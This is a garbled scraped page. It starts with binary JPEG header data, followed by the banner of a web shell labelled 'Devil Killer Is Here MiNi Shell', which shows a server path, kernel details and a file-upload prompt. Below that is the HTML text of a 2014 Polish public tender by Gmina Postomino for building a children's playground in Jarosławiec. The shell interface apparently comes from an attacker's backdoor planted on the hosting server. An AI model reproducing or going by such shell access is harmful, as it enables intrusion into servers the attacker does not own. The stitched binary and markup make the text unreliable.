JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140704/225032-N-2014.html

<p class="kh_header"><b>Postomino: Wykonanie placu zabaw w miejscowości Jarosławiec w ramach projektu pn. Modernizacja oddziałów przedszkolnych czyli likwidacja barier w doztepie do edukacji przedszkolnej na terenie Gminy Postomino</b><br>
<b>Numer ogłoszenia: 225032 - 2014; data zamieszczenia: 04.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Postomino , Postomino 30, 76-113 Postomino, woj. zachodniopomorskie, tel. 0-59 810 85 93, faks 0-59 810 85 84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.postomino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie placu zabaw w miejscowości Jarosławiec w ramach projektu pn. Modernizacja oddziałów przedszkolnych czyli likwidacja barier w doztepie do edukacji przedszkolnej na terenie Gminy Postomino.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie placu zabaw w miejscowości Jarosławiec wraz z nawierzchnią poliuretanową i trawiastą oraz dostawą i montażem wyposażenia placu zabaw.
2. Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
3. Teren placu zabaw - teren przeznaczony na plac zabaw znajduje się na działkach nr 164/1, 378/7 obręb Jarosławiec gmina Postomino i należy do kompleksu obiektów Zespołu Szkół w Jarosławcu. 
4. Opis miejsca przeznaczonego na plac zabaw
Powierzchnia placu zabaw: 401,125 m2
Powierzchnia nawierzchni poliuretanowej: 200,00 m2
Powierzchnia trawiasta: 201,125 m2
5. Plan zagospodarowania
Zaprojektowano plac zabaw o powierzchni 401,125 m2 o bokach 22,00m; 19,00m; 14,5m; 8,75m; 14,5m. Będzie on wydzielony od pozostałej części terenu ogrodzeniem panelowym zgrzewanym punktowo z prętów stalowych pojedynczych poziomych i pionowych przetłaczanych, w celu uzyskania większej sztywności, o wysokości 1,2 m, ocynkowanym ogniowo i malowanym proszkowo na kolor zielony. Wejście na teren placu zabaw będzie wydzielone od strony zachodniej furtką, która będzie miała szerokość 1,0 m. 
6. Prace przygotowawcze
W ramach tych robót należy usunąć 15 cm warstwę ziemi urodzajnej pod plac zabaw o łącznej powierzchni 401,125 m2. Pod nawierzchnię poliuretanową należy wykorytować na dodatkowe 20 cm głębokości o łącznej powierzchni 200,00 m2.
Po wykonaniu robót ziemnych na granicy z terenem przeznaczonym na wykonanie placu zabaw oraz w miejscu rozdziału nawierzchni trawiastej i poliuretanowej należy ustawić obrzeża betonowe o wymiarach 8x30x100 cm.
Roboty ziemne obejmują również wykonanie podbudowy składającej się z 10 cm warstwy odsączającej z piasku o łącznej powierzchni 401,125 m2 oraz 15 cm warstwy podbudowy z kruszywa łamanego 0-31,5 mm stabilizowanej mechanicznie o łącznej powierzchni 200,00 m2 - pod nawierzchnię poliuretanową.
7. Rozwiązania konstrukcyjne
1) Ogrodzenie terenu placu zabaw
Teren placu zabaw będzie oddzielony od pozostałej części terenu szkoły ogrodzeniem o wysokości 1,2 m. Ogrodzenie będzie metalowe, ocynkowane i pomalowane proszkowo na kolor zielony. Rozstaw słupków ogrodzeniowych w osi tych słupków wynosi ok. 2,5 m. Łączna długość ogrodzenia wynosi 78,75 mb.
Ogrodzenie na placu zabaw ma przede wszystkim utrudnić wstęp zwierzętom i ochronić małe dzieci przed wydostaniem się z jego terenu bez opieki opiekuna. Ogrodzenie musi być bezpieczne - elementy powinny być zaokrąglone i odpowiednio wykończone. Wszystkie krawędzie furtki powinny być zaokrąglone i nie powinno być na nich ostrych kantów, o które dzieci mogłyby się zranić. Jeśli w furtce zainstalowano klamkę lub zasuwę, dziecko powinno móc ją otworzyć z obu stron. 
2) Nawierzchnia trawiasta
Część placu zabaw ma być wyłożona nawierzchnią trawiastą - trawą z rolki, unikając zagłębień. Przed założeniem trawnika z rolki należy wykonać 5 cm warstwę humusu na warstwie odsączającej, a następnie na tak przygotowanym podłożu, ułożyć trawnik z rolki.
3) Nawierzchnia bezpieczna poliuretanowa - kolor czerwony
Na części placu zabaw należy wykonać nawierzchnię z poliuretanu o łącznej grubości 40 mm i łącznej powierzchni 200,00 m2. Nawierzchnia ma być przepuszczalna, bezpieczna do stosowania na zewnątrz zgodnie z normą PN-EN 1177 oraz powinna posiadać certyfikat zgodności z normami (nawierzchnie placów zabaw amortyzujące upadki), wydany przez akredytowaną jednostkę certyfikującą. Nawierzchnia musi być przepuszczalna, bez konieczności stosowania odwodnień skanalizowanych. Nawierzchnię poliuretanową należy ograniczyć obrzeżem betonowym na styku z nawierzchnią trawiastą. Nawierzchnię należy układać na warstwie piasku i kruszywa łamanego stabilizowanej mechanicznie. 
W celu ułatwienia spływu wód opadowych należy zastosować spadek poprzeczny 2%. Podłoże nie może wykazywać odchylenia od poziomu większego niż 5 mm przy 
3 - metrowej łacie. Na tak przygotowane podłoże należy ułożyć 5 cm warstwy podsypki piaskowej, na której można dokonywać układania warstw bezpiecznej nawierzchni stosując się do instrukcji producenta.
Nawierzchnia poliuretanowa wylewana składa się z granulatu SBR i EPDM lub TPV, oba granulaty kładzione są na mokro na miejscu przeznaczenia. 
Wykonanie nawierzchni składa się z trzech etapów:
1) Wykonanie podbudowy z kruszyw.
2) Wykonanie warstwy amortyzującej granulatu pochodzącego z recyklingu, zmieszanego we właściwych proporcjach z odpowiednim klejem poliuretanowym.
3) Wykonanie górnej warstwy z granulatu EPDM lub TPV zmieszanego we właściwych proporcjach z odpowiednim klejem poliuretanowym.
II. Opis urządzeń zabawowych 
1. Powierzchnia przeznaczona na plac zabaw w Jarosławcu to 401,125 m2.
2. Wszystkie urządzenia rekreacyjno - zabawowe powinny posiadać certyfikaty zgodności z normami serii PN EN 1176 (wyposażenie placów), wydane przez akredytowaną jednostkę certyfikującą. 
3. Przed podpisaniem umowy Wykonawca placu zabaw zobowiązany będzie do dostarczenia instrukcji do wszystkich urządzeń, które powinny zawierać: 
1) wytyczne dotyczące instalacji,
2) szczegóły funkcjonowania urządzenia,
3) wymogi w zakresie kontroli i konserwacji.
4. Dopuszcza się rozbieżność wymiarów urządzeń w tolerancji +/- 5%. Urządzenia powinny odznaczać się wysoką odpornością na oddziaływanie czynników atmosferycznych. Elementy łączące wzajemnie poszczególne części urządzeń rekreacyjno- zabawowych oraz łańcuchy huśtawek mają być wykonane ze stali nierdzewnej (nie dopuszcza się zastosowania tych elementów ze stali cynkowanej), wystające końcówki elementów złącznych zabezpieczone plastikowymi zaślepkami. Urządzenia należy rozmieszczać 
z zachowaniem stref bezpiecznego użytkowania.  
5. UWAGA!! oferowane urządzenia zabawowe muszą  spełniać odpowiedni i dostosowany do zaprojektowanej na placu zabaw nawierzchni parametr, potocznie zwany WSU czyli wysokość swobodnego upadku. 
6. Wymagany okres gwarancji na przedmiot zamówienia- min. 36 miesięcy. 
8. Opis poszczególnych urządzeń:	
1) Zestaw wielofunkcyjny 2-wieżowy- zestaw składający się z dwóch zadaszonych wież (dach dwuspadowy wykonany z płyt polietylenowych całkowicie odpornych na działanie warunków atmosferycznych), konstrukcja wykonana ze stali cynkowanej, 
a następnie dwukrotnie malowanej proszkowo, ścianki wykonane z płyt polietylenowych. Wieże połączone ze sobą przejściem w postaci mostka i wyposażone w wejście w postaci ścianki wspinaczkowej oraz rurę strażacką, obie wieże wyposażone są w zjeżdżalnię wykonaną ze stali nierdzewnej z bokami z płyt polietylenowych. Zestaw zawiera, co najmniej:
a) 2 wieże,
b) 2 zjeżdżalnie,
c) 1 mostek zawieszony pomiędzy wieżami,
d) 1 ścianka wspinaczkowa,
e) 1 rura strażacka.
Urządzenie dostępne dla grupy wiekowej od lat 3.
2) Bujak sprężynowiec pojedynczy (konik) - bujak w kształcie konika wykonany 
z polietylenu, konstrukcja stalowa oraz sprężyna malowane proszkowo. Rączki do trzymania oraz podpórki pod nogi zamocowane do elementów. Urządzenie dostępne dla grupy wiekowej od lat 3.
3) Bujak sprężynowiec podwójny - bujak na sprężynie wykonany z polietylenu, składający się z poprzeczki, na końcach której znajdują się siedziska umożliwiające korzystanie z bujaka przez dwoje dzieci. Rączki do trzymania oraz podpórki pod nogi zamocowane do elementów. Stalowa konstrukcja wraz ze sprężyną malowane proszkowo. Urządzenie dostępne dla grupy wiekowej od lat 3.
4) Huśtawka wahadłowa podwójna (siedzisko gumowe + koszyk z zabezpieczeniem) - huśtawka wahadłowa o konstrukcji stalowej cynkowanej, a następnie malowanej dwukrotnie proszkowo, łańcuchy stal nierdzewna, zawiesia huśtawek podwójnie łożyskowane - wykonane ze stali nierdzewnej. Jedno siedzisko gumowe, drugie siedzisko w kształcie koszyka umożliwiającego korzystanie z huśtawki przez małe dzieci- z zabezpieczeniem. Urządzenie dostępne dla grupy wiekowej od lat 3.
5) Huśtawka równoważna (wagowa) - huśtawka typu ważka o konstrukcji stalowej cynkowanej- rura, a następnie dwukrotnie malowanej farbami proszkowymi. Element obrotowy huśtawki łożyskowany, siedziska huśtawki wykonane z płyty polietylenowej, poprzeczka huśtawki z zamocowanymi uchwytami w kształcie pierścieni. Amortyzatory gumowe pod siedziskami. Długość urządzenia 265 cm, urządzenie dostępne dla grupy wiekowej od lat 3.
6) Karuzela tarczowa - karuzela platformowa, platforma wykonana z ryflowanej blachy aluminiowej, wyposażona w siedziska na obwodzie z ramą stanowiącą oparcie do siedzisk. W osi karuzeli znajduje się słup z kierownicą do kręcenia. Konstrukcja wykonana ze stali cynkowanej i dwukrotnie malowanej farbami proszkowymi, siedziska z polietylenu. Wymiary urządzenia 150 x 150 cm, urządzenie dostępne dla grupy wiekowej od lat 3.
7) Linarium- stożek/piramida z linek - zestaw sprawnościowy w kształcie stożka/piramidy z siatki linowej, którą wykonano ze stylonowych lin posiadających rdzeń stalowy. Słup nośny stalowy cynkowany lub wykonany z rury nierdzewnej. Wysokość urządzenia 250 cm, urządzenie dostępne dla grupy wiekowej od lat 3.
8) Tor przeszkód - zespół urządzeń sprawnościowych, zestaw zawiera, co najmniej:
a) 1 równoważnia,
b) 4 grzybki/skoczki,
c) 1 równoważnia wisząca.
Urządzenia dostępne dla grupy wiekowej od lat 3.
a) Równoważnia - konstrukcja wykonana ze stali cynkowanej, a następnie dwukrotnie malowanej proszkowo, górna część belki równoważni przykryta belką wykonaną z polietylenu o nawierzchni antypoślizgowej, elementy złączne wykonane ze stali nierdzewnej, wystające końcówki elementów złącznych zabezpieczone plastikowymi zaślepkami. 
b) Grzybek/skoczek - urządzenie sprawnościowe w kształcie grzybka, okrągła płyta osadzona na stalowym słupku,  konstrukcja wykonana ze stali cynkowanej, 
a następnie dwukrotnie malowanej proszkowo, okrągła płyta stanowiąca podest wykonana z antypoślizgowej płyty polietylenowej. Wymiary urządzenia 35 x 35 cm, wysokość 30 cm. 
c) Równoważnia wisząca - urządzenie sprawnościowe składające się z belki podwieszonej do czterech słupów połączonych wzajemnie poprzeczkami, konstrukcja wykonana ze stali cynkowanej, a następnie dwukrotnie malowanej proszkowo, belka balansująca, zawieszona na łańcuchach ze stali nierdzewnej lub linach zbrojonych, elementy złączne wykonane również ze stali nierdzewnej, wystające końcówki elementów złącznych zabezpieczone plastikowymi zaślepkami. Długość urządzenia 230 cm.
9) Kosz na śmieci - konstrukcja stalowa, listwy malowane lakierobejcą. Wkład z rączką do wyciągania. Sposób montażu przez zabetonowanie w gruncie; pojemność 35 L.
10) Ławka - ławka z oparciem o konstrukcji stalowej stanowiącej stelaż do mocowania siedziska i podparcia. Konstrukcja cynkowana, a następnie malowana dwukrotnie proszkowo, siedzisko oraz oparcie drewniane impregnowane w celu zabezpieczenia przed działaniem czynników atmosferycznych, ławka na stałe zakotwiona w gruncie. 
11) Zestaw stołu z 2 ławkami - zestaw składający się z dwóch ławek bez oparć oraz stołu, całość o konstrukcji stalowej, cynkowanej, a następnie malowanej dwukrotnie proszkowo, siedziska oraz blat drewniane impregnowane w celu zabezpieczenia przed działaniem czynników atmosferycznych. Zestaw na stałe zakotwiony w gruncie. 
12) Tablica regulaminowa - wolnostojąca tablica informacyjna z nadrukiem regulaminu placu zabaw oraz nadrukiem informacji o współfinansowaniu wg załączonego wzoru. Stelaż tablicy o konstrukcji stalowej cynkowanej, a następnie malowanej dwukrotnie proszkowo. Treść regulaminu korzystania z placu zabaw umieszczona na blasze ocynkowanej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości: 3500,00 zł, słownie: trzy tysiące pięćset złotych.
2. Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zm.).
3. Wadium wnosi się przed upływem terminu składania ofert.
4. Wadium wnoszone w pieniądzu należy wnieść przelewem na rachunek bankowy 
zamawiającego nr 97 9315 0004 0021 2012 2000 0040. Do oferty należy dołączyć dokument potwierdzający dokonanie przelewu.
5. Za termin wniesienia wadium przyjmuje się datę i godzinę uznania rachunku zamawiającego.
6. W przypadku wniesienia wadium w formie innej niż pieniądz- oryginał dokumentu - w osobnej koszulce należy wnieść wraz z ofertą - nie łączyć go na trwałe z ofertą. 
7. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Prawa zamówień publicznych.
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano. 
9. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo zamówień publicznych,  jeżeli w wyniku rozstrzygnięcia  odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania: 
a) co najmniej jedną robotę budowlaną polegającą na wykonaniu nawierzchni poliuretanowej o powierzchni co najmniej 150 m2  oraz
b) co najmniej dwie roboty budowlane polegające na wykonaniu placu zabaw (dostawa i montaż urządzeń zabawowych) o wartości co najmniej 40000,00 zł brutto każdy oraz załączy dowody dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże osobę, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Przez roboty, których dotyczy obowiązek wskazania w wykazie, Zamawiający rozumie:co najmniej jedną robotę budowlaną polegającą na wykonaniu nawierzchni poliuretanowej o powierzchni co najmniej 150 m2 oraz co najmniej dwie roboty budowlane polegające na wykonaniu placu zabaw (dostawa i montaż urządzeń zabawowych) o wartości co najmniej 40000,00 zł brutto każdy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">potwierdzenie zgodności oferowanych parametrów z opisem - według załącznika nr 7 do SIWZ</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

